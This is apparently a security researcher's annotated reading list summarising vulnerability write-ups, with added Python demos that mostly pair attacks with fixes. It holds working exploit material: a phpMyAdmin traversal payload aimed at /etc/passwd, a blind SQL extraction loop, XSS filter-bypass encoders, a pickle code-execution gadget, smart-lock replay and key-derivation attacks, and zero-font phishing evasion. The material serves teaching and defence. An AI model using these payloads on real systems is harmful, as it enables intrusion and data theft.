Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

ZeroFont Phishing: Manipulating Font Size - 72

Yoav Nathaniel    Reference →Posted 6 Years Ago
  • The weakest part of a company's security is always the people!
  • So phishing is a very effective way to attack a company.
  • However, email providers have figured this out, and natural-language processing is now used to pick phishing messages out by their text.
  • To get past these text filters, the attackers insert junk characters styled with font-size: 0. The junk is invisible to the reader but is still part of the text the filter sees, so the filter and the human read two different messages (it is zero font size, not a zero-width font). People are creative in order to bypass these restrictions!
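As an added example (not code from the ZeroFont write-up), the Python below builds the two views of one constructed HTML email: the text a reader sees, and the text a filter that only walks the text nodes sees. The keyword heuristic, the sample message and the font-size regex are my own; the check at the end simply flags any message that uses zero font size, since there is no honest reason for it in mail.

```python
import re
from html.parser import HTMLParser

# CSS that makes text invisible to the reader but leaves it in the document text.
ZERO_FONT = re.compile(r"font-size\s*:\s*0(?:px|pt|em|rem|%)?\s*(?:;|$)", re.I)
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link"}


class TwoViews(HTMLParser):
    """Collect the text a human sees (rendered) and the text a naive
    content filter sees (scanned: every text node, hidden or not)."""

    def __init__(self):
        super().__init__()
        self.hidden_stack = []      # per open element: is it (or an ancestor) zero-size?
        self.rendered = []
        self.scanned = []
        self.zero_font_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = dict(attrs).get("style") or ""
        inherited = bool(self.hidden_stack and self.hidden_stack[-1])
        zero_here = bool(ZERO_FONT.search(style))
        self.zero_font_tags += zero_here
        self.hidden_stack.append(inherited or zero_here)

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self.hidden_stack:
            self.hidden_stack.pop()

    def handle_data(self, data):
        self.scanned.append(data)
        if not (self.hidden_stack and self.hidden_stack[-1]):
            self.rendered.append(data)


def split_views(html_body):
    """Return (rendered_text, scanned_text, number_of_zero_font_elements)."""
    p = TwoViews()
    p.feed(html_body)
    p.close()
    return "".join(p.rendered), "".join(p.scanned), p.zero_font_tags


# Stand-in for a text-only phishing heuristic (constructed keyword list).
PHISH_TERMS = ("password", "office 365", "verify your account")


def keyword_filter_flags(text):
    t = text.lower()
    return any(term in t for term in PHISH_TERMS)


def is_zero_font_phish(html_body):
    """Flag a message that hides text with zero font size and whose *rendered*
    text trips the heuristic, whatever the raw text looks like."""
    rendered, _scanned, zero_tags = split_views(html_body)
    return zero_tags > 0 and keyword_filter_flags(rendered)


# Constructed sample: zero-size junk splits exactly the words a filter keys on.
SAMPLE_EMAIL = (
    '<p>Your Off<span style="font-size:0px">ZZ</span>ice 365 pass<span style="FONT-SIZE: 0">xq</span>word '
    'expires today. <a href="https://login.example.test/">Sign in</a> to keep your account.</p>'
)

if __name__ == "__main__":
    rendered, scanned, n = split_views(SAMPLE_EMAIL)
    print("reader sees :", rendered)
    print("filter sees :", scanned)
    print("naive keyword filter on raw text:", keyword_filter_flags(scanned))
    print("zero-font elements:", n, "-> phish?", is_zero_font_phish(SAMPLE_EMAIL))
```

Run it and the naive filter says "clean" for the raw text while the reader sees "Your Office 365 password expires today". A real detector would also catch font-size in external CSS, color matching the background, and display:none, which this parser does not look at.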

Solidity Security: List of Attack Vectors and Anti-Patterns - 71

Sigma Prime    Reference →Posted 6 Years Ago
  • Solidity is the language used to write smart contracts on the Ethereum blockchain. Once a contract is on the chain, it cannot be taken back or changed! So being secure with smart contracts is very important.
  • This article gives a list of essentially all attack vectors for smart contracts. For each, it gives an example of vulnerable code with steps for exploitation. Finally, there is a section on preventive techniques.
  • Great article if you are into smart contract security!

phpMyAdmin LFI to RCE - 70

Ambulong    Reference →Posted 6 Years Ago
  • The first sign of this vulnerability was the code include $_REQUEST['target']. That says: include a file whose name comes straight from a request parameter!
  • Next, there is a filter. It checks that the value is a valid page (a whitelist of phpMyAdmin pages) and that it is not import.php or export.php. The whitelist check URL-decodes the value and only looks at the part before a "?", but the include uses the raw value. So by double URL encoding a question mark in the path (%253f), the check sees a whitelisted page while the include follows the "../" components after it, and any file on the server can be included!
  • To turn this into an RCE, run the SQL query "select '<?php phpinfo();exit;?>'". phpMyAdmin keeps the query text in the PHP session, which is written to a session file on disk (sess_<PHPSESSID>). Including that file through the same LFI executes the PHP inside it!
  • Additional link for exploitation: ChaMd5 Security Team.
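To make the double-encoding bypass concrete, here is an added Python transcription of the vulnerable check as I read it from phpMyAdmin 4.8.1 (Core::checkPageValidity and the guard in index.php), with an abbreviated whitelist and an assumed webroot of /var/www/html. This is illustration code, not phpMyAdmin's own; the strict check at the end is a generic fix, not the project's actual patch.

```python
import posixpath
from urllib.parse import unquote

# Abbreviated stand-in for phpMyAdmin's Core::$goto_whitelist (the real list is much longer).
GOTO_WHITELIST = ["db_sql.php", "server_sql.php", "tbl_sql.php", "sql.php"]
# index.php's $target_blacklist as the write-up describes it.
TARGET_BLACKLIST = ["import.php", "export.php"]


def check_page_validity(page, whitelist=GOTO_WHITELIST):
    """Python transcription of the vulnerable Core::checkPageValidity() logic.
    The third branch urldecodes the value before taking the part in front of '?',
    but index.php goes on to include the *undecoded* value."""
    if not isinstance(page, str) or page == "":
        return False
    if page in whitelist:
        return True
    _page = page[: (page + "?").index("?")]     # mb_substr($page, 0, mb_strpos($page . '?', '?'))
    if _page in whitelist:
        return True
    _page = unquote(page)                        # urldecode($page)
    _page = _page[: (_page + "?").index("?")]
    return _page in whitelist


def index_php_target(target_query_value):
    """The index.php guard. PHP has already URL-decoded the query string once,
    so a double-encoded '%253f' reaches the check as '%3f'. Returns the value
    that `include $_REQUEST['target']` would receive, or None if blocked."""
    target = unquote(target_query_value)
    if (target
            and not target.startswith("index")
            and target not in TARGET_BLACKLIST
            and check_page_validity(target)):
        return target
    return None


def include_resolves_to(webroot, target):
    """include() walks '..' without requiring 'db_sql.php%3f' to exist,
    so the path normalises straight out of the webroot."""
    return posixpath.normpath(posixpath.join(webroot, target))


def check_page_validity_fixed(page, whitelist=GOTO_WHITELIST):
    """Strict check: the literal value must be a whitelisted page. No decoding, no '?' trimming."""
    return isinstance(page, str) and page in whitelist


if __name__ == "__main__":
    payload = "db_sql.php%253f/../../../../etc/passwd"      # what the attacker puts in the URL
    target = index_php_target(payload)
    print("guard passed :", target is not None)
    print("include gets :", target)
    print("resolves to  :", include_resolves_to("/var/www/html", target))
    print("strict check :", check_page_validity_fixed(target))
```

The same path, pointed at the PHP session directory instead of /etc/passwd, is what turns the query-in-session trick above into code execution.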

Windows Filesystem Tricks - 69

René Freingruber     Reference →Posted 6 Years Ago
  • Several of these issues are quite amazing (and have not been patched). However, before getting to the tricks themselves, there is a bigger lesson in this article.
    • When people code, they check and validate for what they know is legal and allowed. But what if something isn't accounted for? What happens then?
    • It's really important to think as the programmer: what would you have done here?
    • When things like odd encodings, edge cases and the real on-disk representation of a name aren't accounted for, bypasses start to happen.
    • The usable-but-not-normal form of an input is where a lot of bypasses live.
  • NTFS names have the form filename:streamname:streamtype. A plain file is really file.txt::$DATA (empty stream name, default $DATA type) and a folder is folder::$INDEX_ALLOCATION. This will help with the rest of the bypasses below.
  • Create Folders without the proper Permissions: Although this was patched, it is still interesting. Appending "::$INDEX_ALLOCATION" to a filename creates a folder instead of a file, and a permission check written for files did not account for this corner case.
  • Bypass Path Restrictions with Alternate Data Streams: The default data stream is $DATA, but a file can carry additional named streams (file.txt:hidden). Writing to a different stream can bypass simple whitelisting solutions that only look at the filename.
  • Create Files which can't be found by using the "..." folder: Normally a file or folder whose name is only dots cannot be created. But with the index allocation trick it can, and files placed inside are hard to find with the usual tools.
  • "Hide" the Destination of a Directory Junction: Junctions are like symbolic links in Windows. The index allocation trick can be used to hide where one points.
  • Overall, this is about understanding how the system works and abusing its features to make something beautiful :)
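To show the "think like the programmer" point in code, here is an added example of my own (not from the article): a parser that splits a name the way NTFS does, a typical string-based upload check that is fooled by stream syntax, and a check that decides on the object NTFS would actually create. It is pure string logic, so it runs on any OS; actually creating such names needs Windows on NTFS.

```python
# Added example: how NTFS reads a name vs. how a string-based upload check reads it.
BLOCKED_EXT = {".php", ".exe", ".aspx", ".jsp"}
RESERVED_CHARS = set('<>:"/\\|?*') | {chr(i) for i in range(32)}
RESERVED_NAMES = {"CON", "PRN", "AUX", "NUL",
                  *[f"COM{i}" for i in range(1, 10)], *[f"LPT{i}" for i in range(1, 10)]}


def parse_ntfs_name(leaf):
    """Split a single path component the way NTFS does: filename[:streamname][:$streamtype].
    'file.txt' and 'file.txt::$DATA' are the same object; 'x::$INDEX_ALLOCATION' is a directory."""
    parts = leaf.split(":")
    if len(parts) > 3:
        raise ValueError("more than two ':' in a component is invalid")
    base = parts[0]
    stream = parts[1] if len(parts) > 1 else ""
    stype = parts[2] if len(parts) > 2 else "$DATA"
    return base, stream, stype


def extension_of(leaf):
    return leaf[leaf.rfind("."):].lower() if "." in leaf else ""


def naive_upload_allowed(leaf):
    """A typical check: no traversal, and the text after the last dot is not a blocked
    extension. It reasons about the string, not about what NTFS will create."""
    if "/" in leaf or "\\" in leaf or ".." in leaf:
        return False
    return extension_of(leaf) not in BLOCKED_EXT


def hardened_upload_allowed(leaf):
    """Decide on the object NTFS will actually create, not on the raw string."""
    if not leaf or any(c in RESERVED_CHARS for c in leaf):
        return False                      # ':' alone rules out every stream/type trick
    if leaf.rstrip(". ") != leaf:
        return False                      # Win32 strips trailing dots/spaces; '...' is the hidden-folder trick
    if leaf.split(".")[0].upper() in RESERVED_NAMES:
        return False                      # CON.txt and friends are devices, not files
    base, _stream, _stype = parse_ntfs_name(leaf)   # now identical to leaf itself
    return extension_of(base) not in BLOCKED_EXT


if __name__ == "__main__":
    for name in ["shell.php", "shell.php::$DATA", "report.txt:hidden", "...::$INDEX_ALLOCATION"]:
        print(f"{name:26} ntfs={parse_ntfs_name(name)}  naive={naive_upload_allowed(name)}  "
              f"hardened={hardened_upload_allowed(name)}")
```

The naive check lets "shell.php::$DATA" through because the text after the last dot is ".php::$DATA", yet NTFS writes that content to shell.php. Rejecting ':' (and the other characters Win32 reserves) removes the whole class rather than chasing individual stream types.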

Bypassing Host Header to SQL injection to dumping Database -- An unusual case of SQL injection - 68

Avinash Jain    Reference →Posted 6 Years Ago
  • While testing the X-Forwarded-To header against a host white/blacklist, the author noticed that its value was being processed in some way. After adding some extra input to the header, an SQL error came back.
  • Using a time-based blind injection, data was then pulled out of the database.
  • Takeaways:
    • Headers are a valid place to look for vulnerabilities, particularly in how they are processed server-side.
    • Understand what normal is. If something is not normal, evaluate it for a potential vulnerability.
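The pattern behind the write-up, as an added example of my own (not the author's code or target): a header value concatenated into a host-lookup query, the single-quote probe that produces the SQL error, and the character-by-character extraction loop. The schema and values are constructed; SQLite has no SLEEP(), so the oracle here is the allow/deny answer rather than a time delay, which is the same loop with a different signal.

```python
import sqlite3


def build_db():
    """Constructed sample database standing in for the target's backend."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE allowed_hosts(host TEXT);
        INSERT INTO allowed_hosts VALUES ('app.example.test');
        CREATE TABLE users(name TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', 'ad82e7b1');
    """)
    return db


def host_allowed_vulnerable(db, header_value):
    """The flaw: a header value dropped straight into SQL."""
    sql = "SELECT 1 FROM allowed_hosts WHERE host = '" + header_value + "'"
    return db.execute(sql).fetchone() is not None


def host_allowed_fixed(db, header_value):
    """Same lookup with a bound parameter: the header is data, never SQL."""
    row = db.execute("SELECT 1 FROM allowed_hosts WHERE host = ?", (header_value,)).fetchone()
    return row is not None


def probe(db, check, header_value):
    """Step 1 of the write-up: send a lone quote and see whether the backend errors."""
    try:
        check(db, header_value)
        return "ok"
    except sqlite3.Error as e:
        return type(e).__name__


def extract(db, check, inner_query, alphabet="0123456789abcdef", maxlen=32):
    """Step 2: use the check's yes/no answer as a one-bit oracle and read the
    result of inner_query one character at a time."""
    found = ""
    for pos in range(1, maxlen + 1):
        for ch in alphabet:
            payload = f"x' OR substr(({inner_query}),{pos},1)='{ch}"
            if check(db, payload):
                found += ch
                break
        else:
            break                       # no character matched: end of the string
    return found


SECRET_QUERY = "SELECT password_hash FROM users WHERE name='admin'"

if __name__ == "__main__":
    db = build_db()
    print("probe vulnerable :", probe(db, host_allowed_vulnerable, "'"))
    print("probe fixed      :", probe(db, host_allowed_fixed, "'"))
    print("dumped via header:", extract(db, host_allowed_vulnerable, SECRET_QUERY))
    print("dumped via fixed :", repr(extract(db, host_allowed_fixed, SECRET_QUERY)))
```

Against the parameterised version the probe returns no error and the loop returns an empty string, because the whole payload is compared as a literal host name.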

Odd XSS on Amazon - 67

Jonathon Bouman    Reference →Posted 6 Years Ago
  • After taking apart the Amazon Android mobile application, the author found a URL that he had not seen before.
  • This URL had a parameter that was reflected directly into JavaScript. By inserting a marquee tag, text scrolled across the screen!
  • Several mechanisms had to be bypassed. To start with, the reflected input was converted to upper case, which breaks case-sensitive JavaScript. This was bypassed by HTML-entity encoding every character and then URL encoding the result: numeric entities are only digits and hex, so uppercasing does not change their meaning, and the browser decodes them back to the original case.
  • Overall, this article has several cool tricks for bypassing restrictions (octal character encoding or jscrewit).
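An added example (my own, not the author's) of why the encoding layers survive uppercasing. The server model is constructed: URL-decode the parameter, uppercase it, reflect it. Entity decoding applies when the sink is an HTML attribute that the parser decodes before the JavaScript engine sees it; the octal variant applies inside a JS string literal (a legacy feature that strict-mode code and template literals reject).

```python
import html
import re
from urllib.parse import quote, unquote


def html_hex_entities(s):
    """Encode every character as a numeric entity. The letters that uppercasing would
    mangle are now digits and hex, and '&#X61;' is still valid HTML."""
    return "".join(f"&#x{ord(c):x};" for c in s)


def js_octal_escapes(s):
    """Same idea for a JS string literal: '\\141' is digits only, so case changes cannot touch it."""
    return "".join(f"\\{ord(c):o}" for c in s)


def server_reflect(query_value):
    """Constructed model of the endpoint: URL-decode the parameter, uppercase, reflect."""
    return unquote(query_value).upper()


def browser_attribute_decode(attr_value):
    """What the HTML parser does to an attribute value (e.g. onclick="...") before JS runs it."""
    return html.unescape(attr_value)


def js_string_decode(literal_body):
    """Minimal decoder for legacy octal escapes in a non-strict JS string literal."""
    return re.sub(r"\\([0-3][0-7]{2}|[4-7][0-7]|[0-7])",
                  lambda m: chr(int(m.group(1), 8)), literal_body)


def deliver(payload, encoder, decoder):
    """Full path: attacker encodes -> URL-encodes -> server decodes, uppercases, reflects -> browser decodes."""
    on_the_wire = quote(encoder(payload), safe="")
    reflected = server_reflect(on_the_wire)
    return reflected, decoder(reflected)


PAYLOAD = "alert(document.domain)"

if __name__ == "__main__":
    print("plain         :", server_reflect(quote(PAYLOAD, safe="")))
    print("html entities :", deliver(PAYLOAD, html_hex_entities, browser_attribute_decode))
    print("js octal      :", deliver(PAYLOAD, js_octal_escapes, js_string_decode))
```

The plain payload comes back as ALERT(DOCUMENT.DOMAIN), which is not a function; both encoded forms come back uppercased yet decode to the original.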

Analysis of Apache Struts RCE - 66

McAfee     Reference →Posted 6 Years Ago
  • This article has a great description of an Apache Struts RCE (a Struts RCE is what was used to break into Equifax). McAfee does great research and work! :)
  • Essentially, the issue is in the parsing engine that deserializes objects: attacker-controlled input is turned into objects, and code belonging to those objects runs during that process.
  • Anytime there is serialization or deserialization within a program, it is likely to be riddled with bugs. Always attack the serialization. It may take time and a deep understanding of the system, but it is worthwhile!
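To show why "deserialization runs code" in a form you can execute, here is an added example in Python (its pickle format, not Struts or Java; the mechanism is the same: the serialized data names a callable and the loader calls it). The gadget calls a harmless os.getcwd(); the restricted loader is one standard mitigation, an allow-list in find_class. This is my illustration, not code from the McAfee article.

```python
import io
import os
import pickle


class Gadget:
    """A harmless stand-in for a deserialization gadget: unpickling it calls os.getcwd().
    The pickle stores (callable, args); the loader calls it. Any other callable works the same way."""

    def __reduce__(self):
        return (os.getcwd, ())


def make_payload():
    return pickle.dumps(Gadget())


def make_benign():
    return pickle.dumps({"ok": [1, 2, 3]})


def loads_unsafe(blob):
    """Trusting deserialization: code runs during the load, before the caller sees an object."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Only resolve names from an explicit allow-list; everything else is refused."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def loads_safe(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def safe_rejects(blob):
    try:
        loads_safe(blob)
        return False
    except pickle.UnpicklingError:
        return True


def demo():
    """(did code run during the unsafe load?, did the restricted loader refuse the blob?)"""
    blob = make_payload()
    ran_code = loads_unsafe(blob) == os.getcwd()
    return ran_code, safe_rejects(blob)


if __name__ == "__main__":
    print("unsafe load returned:", loads_unsafe(make_payload()))
    print("(ran code, restricted loader refused):", demo())
    print("benign data through restricted loader:", loads_safe(make_benign()))
```

Note that loads_unsafe never inspects the object: by the time it returns, os.getcwd() has already run. That ordering is the whole problem with deserializing untrusted input.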

Letting the Daemons Out of the Box - 65

HackerCat    Reference →Posted 6 Years Ago
  • Pandora FMS is a server monitoring product that ships dockerized.
  • Several vulnerabilities were found, eventually leading to an RCE by chaining two of them. Besides those, there is a reflected XSS because content is inserted directly into the JavaScript.
  • An unauthenticated local file inclusion (LFI) can also be performed with a request to GET /pandora_console/ajax.php?page=include/config: the application appends .php to the value and includes the result. This LFI executes the included PHP!
  • With the LFI above, plugins can be uploaded in the form of a zip file. This makes it possible to upload a malicious PHP shell that is unzipped and then callable by the user.
  • Chaining the LFI with the file upload gives an unauthenticated RCE (Remote Code Execution). Chaining bugs is always interesting: it turns small issues into bigger ones!

Pwning Tapplock Smart Lock - 64

Pentest Partners    Reference →Posted 6 Years Ago
  • I always enjoy when ridiculous/untrue security claims are made. This lock claims "'AES 128-bit encryption' with an inference that their security is on a parallel with the military". LOL
  • With lots of IoT products it is not just about the software itself... The software on the lock is useless if the hardware/physical side of the lock can easily be bypassed.
  • This lock was vulnerable to a replay attack: even though the data is encrypted, just capturing the unlock command and resending the encrypted bytes opens the lock.
  • Additionally, the key is derived from the lock's MAC address (which is given out at pairing time). So the replay attack above is not even needed! The secret value can be computed from the MAC address alone.
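Both flaws modelled in one added example (my own, not Pentest Partners' code): a lock whose key is derived from a broadcast identifier and which accepts any correctly keyed command forever, next to one that holds a real secret and binds each command to a one-shot challenge. Assumptions: the derivation "first 8 hex characters of MD5 of the uppercased MAC" stands in for whatever the app actually computed, and an HMAC stands in for the lock's encrypted command, since the cipher is irrelevant to either flaw.

```python
import hashlib
import hmac
import os


def derive_key_from_mac(ble_mac):
    """ASSUMPTION, modelled on the finding that the key comes from the MAC: key = first 8 hex
    chars of MD5(uppercased MAC). The exact formatting the app used is not reproduced here;
    the point is that the only input is a value the lock broadcasts."""
    return hashlib.md5(ble_mac.upper().encode()).hexdigest()[:8].encode()


def unlock_token(key, nonce=b""):
    """The phone's unlock command. HMAC stands in for the 'AES 128-bit' message."""
    return hmac.new(key, nonce + b"UNLOCK", "sha256").digest()


class ReplayableLock:
    """Models the lock as found: any correctly keyed UNLOCK command opens it, every time."""

    def __init__(self, ble_mac):
        self.ble_mac = ble_mac                       # visible to anyone in BLE range
        self.key = derive_key_from_mac(ble_mac)

    def unlock(self, token):
        return hmac.compare_digest(token, unlock_token(self.key))


class ChallengeLock:
    """A lock that holds a secret not derivable from anything it broadcasts and binds
    each command to a fresh one-shot nonce, so a captured command is useless later."""

    def __init__(self, secret_key):
        self.key = secret_key
        self.pending = None

    def challenge(self):
        self.pending = os.urandom(16)
        return self.pending

    def unlock(self, token):
        if self.pending is None:
            return False
        expected = unlock_token(self.key, self.pending)
        self.pending = None                          # nonce is consumed whether or not this succeeds
        return hmac.compare_digest(token, expected)


def replay_attack(ble_mac="AA:BB:CC:DD:EE:FF"):
    """Sniff one legitimate unlock, resend it later. Returns (owner's result, replay result)."""
    lock = ReplayableLock(ble_mac)
    captured = unlock_token(derive_key_from_mac(ble_mac))   # the owner's command, seen over the air
    return lock.unlock(captured), lock.unlock(captured)


def key_derivation_attack(ble_mac="AA:BB:CC:DD:EE:FF"):
    """No sniffed unlock needed: the advertised MAC alone yields the key."""
    lock = ReplayableLock(ble_mac)
    attacker_key = derive_key_from_mac(lock.ble_mac)
    return lock.unlock(unlock_token(attacker_key))


def replay_against_challenge_lock():
    """Same sniff-and-resend against the challenge lock. Returns (owner's result, replay result)."""
    secret = os.urandom(16)
    lock = ChallengeLock(secret)
    captured = unlock_token(secret, lock.challenge())       # owner's legitimate unlock
    legit = lock.unlock(captured)
    lock.challenge()                                        # attacker starts a new session...
    replayed = lock.unlock(captured)                        # ...and replays the old command
    return legit, replayed


if __name__ == "__main__":
    print("replay (first, again)     :", replay_attack())
    print("forge from MAC only       :", key_derivation_attack())
    print("replay vs challenge lock  :", replay_against_challenge_lock())
```

The challenge lock still fails if its secret is derived from the MAC, so the two fixes are independent: a per-device secret that is not derivable from public data, and a freshness value in every command.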

Machine Learning to Detect Malware - 63

Trend Micro     Reference →Posted 6 Years Ago
  • Essentially, Trend Micro detects malware using machine learning. Although AI and machine learning are huge buzzwords, anomaly detection seems like a genuinely good task for machine learning.